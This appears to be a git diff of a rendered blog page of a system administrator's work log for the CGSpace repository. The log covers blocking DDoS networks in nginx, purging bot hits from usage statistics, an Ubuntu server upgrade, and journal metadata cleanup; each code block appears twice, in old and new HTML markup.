</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>https://asn.ipinfo.app/api/text/nginx/AS46844 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS206485 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS62282 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS36352 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS35913 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS35624 \
</span></span><span style="display:flex;"><span>https://asn.ipinfo.app/api/text/nginx/AS8100
</span></span><span style="display:flex;"><span>$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>4007
</span></span></code></pre></div><ul>
<li>I re-applied these networks to nginx on CGSpace (linode18) and DSpace Test (linode26), and purged 14,000 more Solr statistics hits from these IPs</li>
</ul>
<h2 id="2021-07-22">2021-07-22</h2>

View File

@ -32,7 +32,7 @@ Update Docker images on AReS server (linode20) and reboot the server:
I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -122,37 +122,37 @@ I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
<ul>
<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
</ul>
<ul>
<li>First running all existing updates, taking some backups, checking for broken packages, and then rebooting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># apt update <span style="color:#f92672">&amp;&amp;</span> apt dist-upgrade
# apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
# check <span style="color:#66d9ef">for</span> any packages with residual configs we can purge
# dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span>
# dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
# dpkg -C
# dpkg -l &gt; 2021-08-01-linode20-dpkg.txt
# tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
# reboot
# sed -i <span style="color:#e6db74">&#39;s/bionic/focal/&#39;</span> /etc/apt/sources.list.d/*.list
# <span style="color:#66d9ef">do</span>-release-upgrade
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt dist-upgrade
</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
</span></span><span style="display:flex;"><span># check <span style="color:#66d9ef">for</span> any packages with residual configs we can purge
</span></span><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span>
</span></span><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
</span></span><span style="display:flex;"><span># dpkg -C
</span></span><span style="display:flex;"><span># dpkg -l &gt; 2021-08-01-linode20-dpkg.txt
</span></span><span style="display:flex;"><span># tar -I zstd -cvf 2021-08-01-etc.tar.zst /etc
</span></span><span style="display:flex;"><span># reboot
</span></span><span style="display:flex;"><span># sed -i <span style="color:#e6db74">&#39;s/bionic/focal/&#39;</span> /etc/apt/sources.list.d/*.list
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">do</span>-release-upgrade
</span></span></code></pre></div><ul>
<li>&hellip; but of course it hit <a href="https://bugs.launchpad.net/ubuntu/+source/libxcrypt/+bug/1903838">the libxcrypt bug</a></li>
<li>I had to get a copy of libcrypt.so.1.1.0 from a working Ubuntu 20.04 system and finish the upgrade manually</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># apt install -f
# apt dist-upgrade
# reboot
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt install -f
</span></span><span style="display:flex;"><span># apt dist-upgrade
</span></span><span style="display:flex;"><span># reboot
</span></span></code></pre></div><ul>
<li>After rebooting I purged all packages with residual configs and cleaned up again:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
# apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># dpkg -l | grep -E <span style="color:#e6db74">&#39;^rc&#39;</span> | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -P
</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
</span></span></code></pre></div><ul>
<li>Then I cleared my local Ansible fact cache and re-ran the <a href="https://github.com/ilri/rmg-ansible-public">infrastructure playbooks</a></li>
<li>Open <a href="https://github.com/ilri/OpenRXV/issues/111">an issue for the value mappings global replacement bug in OpenRXV</a></li>
<li>Advise Peter and Abenet on expected CGSpace budget for 2022</li>
@ -190,21 +190,21 @@ I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2021-08-05-all-ips.txt
# wc -l /tmp/2021-08-05-all-ips.txt
43428 /tmp/2021-08-05-all-ips.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2021-08-05-all-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/2021-08-05-all-ips.txt
</span></span><span style="display:flex;"><span>43428 /tmp/2021-08-05-all-ips.txt
</span></span></code></pre></div><ul>
<li>Already I can see that the total is much less than during the attack on one weekend last month (over 50,000!)
<ul>
<li>Indeed, now I see that there are no IPs from those networks coming in now:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/2021-08-05-all-ips-to-purge.csv
$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
0 /tmp/2021-08-05-all-ips-to-purge.csv
</code></pre></div><h2 id="2021-08-08">2021-08-08</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/2021-08-05-all-ips-to-purge.csv
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
</span></span><span style="display:flex;"><span>0 /tmp/2021-08-05-all-ips-to-purge.csv
</span></span></code></pre></div><h2 id="2021-08-08">2021-08-08</h2>
<ul>
<li>Advise IWMI colleagues on best practices for thumbnails</li>
<li>Add a handful of mappings for incorrect countries, regions, and licenses on AReS and start a new harvest
@ -220,8 +220,8 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
</span></span></code></pre></div><ul>
<li>That IP is on Amazon, and from looking at the DSpace logs I don&rsquo;t see them logging in at all, only scraping&hellip; so I will purge hits from that IP</li>
<li>I see 93.158.90.30 is some Swedish IP that also has a normal-looking user agent, but never logs in and requests thousands of XMLUI pages, I will purge their hits too
<ul>
@ -232,14 +232,14 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
<li>3.225.28.105 uses a normal-looking user agent but makes thousands of request to the REST API a few seconds apart</li>
<li>61.143.40.50 is in China and uses this hilarious user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}&#34;
</span></span></code></pre></div><ul>
<li>47.252.80.214 is owned by Alibaba in the US and has the same user agent</li>
<li>159.138.131.15 is in Hong Kong and also seems to be a bot because I never see it log in and it downloads 4,300 PDFs over the course of a few hours</li>
<li>95.87.154.12 seems to be a new bot with the following user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
</span></span></code></pre></div><ul>
<li>They have a legitimate EU-funded project to enrich data for under-resourced languages in the EU
<ul>
<li>I will purge the hits and add them to our list of bot overrides in the mean time before I submit it to COUNTER-Robots</li>
@ -247,37 +247,37 @@ $ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
</li>
<li>I see a new bot using this user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">nettle (+https://www.nettle.sk)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>nettle (+https://www.nettle.sk)
</span></span></code></pre></div><ul>
<li>129.0.211.251 is in Cameroon and uses a normal-looking user agent, but seems to be a bot of some sort, as it downloaded 900 PDFs over a short period.</li>
<li>217.182.21.193 is on OVH in France and uses a Linux user agent, but never logs in and makes several requests per minute, over 1,000 in a day</li>
<li>103.135.104.139 is in Hong Kong and also seems to be making real requests, but makes way too many to be a human</li>
<li>There are probably more but that&rsquo;s most of them over 1,000 hits last month, so I will purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 10796 hits from 35.174.144.154 in statistics
Purging 9993 hits from 93.158.90.30 in statistics
Purging 6092 hits from 130.255.162.173 in statistics
Purging 24863 hits from 3.225.28.105 in statistics
Purging 2988 hits from 93.158.90.91 in statistics
Purging 2497 hits from 61.143.40.50 in statistics
Purging 13866 hits from 159.138.131.15 in statistics
Purging 2721 hits from 95.87.154.12 in statistics
Purging 2786 hits from 47.252.80.214 in statistics
Purging 1485 hits from 129.0.211.251 in statistics
Purging 8952 hits from 217.182.21.193 in statistics
Purging 3446 hits from 103.135.104.139 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 90485
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
</span></span><span style="display:flex;"><span>Purging 10796 hits from 35.174.144.154 in statistics
</span></span><span style="display:flex;"><span>Purging 9993 hits from 93.158.90.30 in statistics
</span></span><span style="display:flex;"><span>Purging 6092 hits from 130.255.162.173 in statistics
</span></span><span style="display:flex;"><span>Purging 24863 hits from 3.225.28.105 in statistics
</span></span><span style="display:flex;"><span>Purging 2988 hits from 93.158.90.91 in statistics
</span></span><span style="display:flex;"><span>Purging 2497 hits from 61.143.40.50 in statistics
</span></span><span style="display:flex;"><span>Purging 13866 hits from 159.138.131.15 in statistics
</span></span><span style="display:flex;"><span>Purging 2721 hits from 95.87.154.12 in statistics
</span></span><span style="display:flex;"><span>Purging 2786 hits from 47.252.80.214 in statistics
</span></span><span style="display:flex;"><span>Purging 1485 hits from 129.0.211.251 in statistics
</span></span><span style="display:flex;"><span>Purging 8952 hits from 217.182.21.193 in statistics
</span></span><span style="display:flex;"><span>Purging 3446 hits from 103.135.104.139 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 90485
</span></span></code></pre></div><ul>
<li>Then I purged a few thousand more by user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri
Found 2707 hits from MaCoCu in statistics
Found 1785 hits from nettle in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 4492
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri
</span></span><span style="display:flex;"><span>Found 2707 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Found 1785 hits from nettle in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 4492
</span></span></code></pre></div><ul>
<li>I found some CGSpace metadata in the wrong fields
<ul>
<li>Seven metadata in dc.subject (57) should be in dcterms.subject (187)</li>
@ -289,8 +289,8 @@ Found 1785 hits from nettle in statistics
</li>
<li>I exported the entire CGSpace repository as a CSV to do some work on ISSNs and ISBNs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]&#39;</span> /tmp/2021-08-08-cgspace.csv &gt; /tmp/2021-08-08-issn-isbn.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]&#39;</span> /tmp/2021-08-08-cgspace.csv &gt; /tmp/2021-08-08-issn-isbn.csv
</span></span></code></pre></div><ul>
<li>Then in OpenRefine I merged all null, blank, and en fields into the <code>en_US</code> one for each, removed all spaces, fixed invalid multi-value separators, removed everything other than ISSN/ISBNs themselves
<ul>
<li>In total it was a few thousand metadata entries or so so I had to split the CSV with <code>xsv split</code> in order to process it</li>
@ -303,20 +303,20 @@ Found 1785 hits from nettle in statistics
<ul>
<li>Extract all unique ISSNs to look up on Sherpa Romeo and Crossref</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;cg.issn[en_US]&#39;</span> ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c <span style="color:#ae81ff">1</span> -r <span style="color:#e6db74">&#39;^[0-9]{4}&#39;</span> | sed 1d | sort | uniq &gt; /tmp/2021-08-09-issns.txt
$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;cg.issn[en_US]&#39;</span> ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c <span style="color:#ae81ff">1</span> -r <span style="color:#e6db74">&#39;^[0-9]{4}&#39;</span> | sed 1d | sort | uniq &gt; /tmp/2021-08-09-issns.txt
</span></span><span style="display:flex;"><span>$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
</span></span><span style="display:flex;"><span>$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
</span></span></code></pre></div><ul>
<li>Then I updated the CSV headers for each and joined the CSVs on the issn column:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ sed -i <span style="color:#e6db74">&#39;1s/journal title/sherpa romeo journal title/&#39;</span> /tmp/2021-08-09-journals-sherpa-romeo.csv
$ sed -i <span style="color:#e6db74">&#39;1s/journal title/crossref journal title/&#39;</span> /tmp/2021-08-09-journals-crossref.csv
$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv &gt; /tmp/2021-08-09-journals-all.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sed -i <span style="color:#e6db74">&#39;1s/journal title/sherpa romeo journal title/&#39;</span> /tmp/2021-08-09-journals-sherpa-romeo.csv
</span></span><span style="display:flex;"><span>$ sed -i <span style="color:#e6db74">&#39;1s/journal title/crossref journal title/&#39;</span> /tmp/2021-08-09-journals-crossref.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv &gt; /tmp/2021-08-09-journals-all.csv
</span></span></code></pre></div><ul>
<li>In OpenRefine I faceted by blank in each column and copied the values from the other, then created a new column to indicate whether the values were the same with this GREL:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">if(cells[&#39;sherpa romeo journal title&#39;].value == cells[&#39;crossref journal title&#39;].value,&#34;same&#34;,&#34;different&#34;)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>if(cells[&#39;sherpa romeo journal title&#39;].value == cells[&#39;crossref journal title&#39;].value,&#34;same&#34;,&#34;different&#34;)
</span></span></code></pre></div><ul>
<li>Then I exported the list of journals that differ and sent it to Peter for comments and corrections
<ul>
<li>I want to build an updated controlled vocabulary so I can update CGSpace and reconcile our existing metadata against it</li>
@ -332,15 +332,15 @@ $ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-jour
</li>
<li>I did some tests of the memory used and time elapsed with libvips, GraphicsMagick, and ImageMagick:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s-vips.jpg[Q=85,optimize_coding,strip]&#39;</span>
39004:0.08
$ /usr/bin/time -f %M:%e gm convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -quality <span style="color:#ae81ff">85</span> -thumbnail x600 -flatten IPCC-gm.jpg
40932:0.53
$ /usr/bin/time -f %M:%e convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
41724:0.59
$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality <span style="color:#ae81ff">85</span> -thumbnail 600x600 IPCC-im.jpg
24736:0.04
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s-vips.jpg[Q=85,optimize_coding,strip]&#39;</span>
</span></span><span style="display:flex;"><span>39004:0.08
</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e gm convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -quality <span style="color:#ae81ff">85</span> -thumbnail x600 -flatten IPCC-gm.jpg
</span></span><span style="display:flex;"><span>40932:0.53
</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
</span></span><span style="display:flex;"><span>41724:0.59
</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality <span style="color:#ae81ff">85</span> -thumbnail 600x600 IPCC-im.jpg
</span></span><span style="display:flex;"><span>24736:0.04
</span></span></code></pre></div><ul>
<li>The ImageMagick way is the same as how DSpace does it (first creating an intermediary image, then getting a thumbnail)
<ul>
<li>libvips does use less time and memory&hellip; I should do more tests!</li>
@ -359,17 +359,17 @@ $ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d &gt; /tmp/journals1.txt
$ csvcut -c <span style="color:#e6db74">&#39;sherpa romeo journal title&#39;</span> ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d &gt; /tmp/journals2.txt
$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
1911
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d &gt; /tmp/journals1.txt
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;sherpa romeo journal title&#39;</span> ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d &gt; /tmp/journals2.txt
</span></span><span style="display:flex;"><span>$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
</span></span><span style="display:flex;"><span>1911
</span></span></code></pre></div><ul>
<li>Now I will create a controlled vocabulary out of this list and reconcile our existing journal title metadata with it in OpenRefine</li>
<li>I exported a list of all the journal titles we have in the <code>cg.journal</code> field:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT(text_value) AS &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
COPY 3245
</code></pre></div><ul>
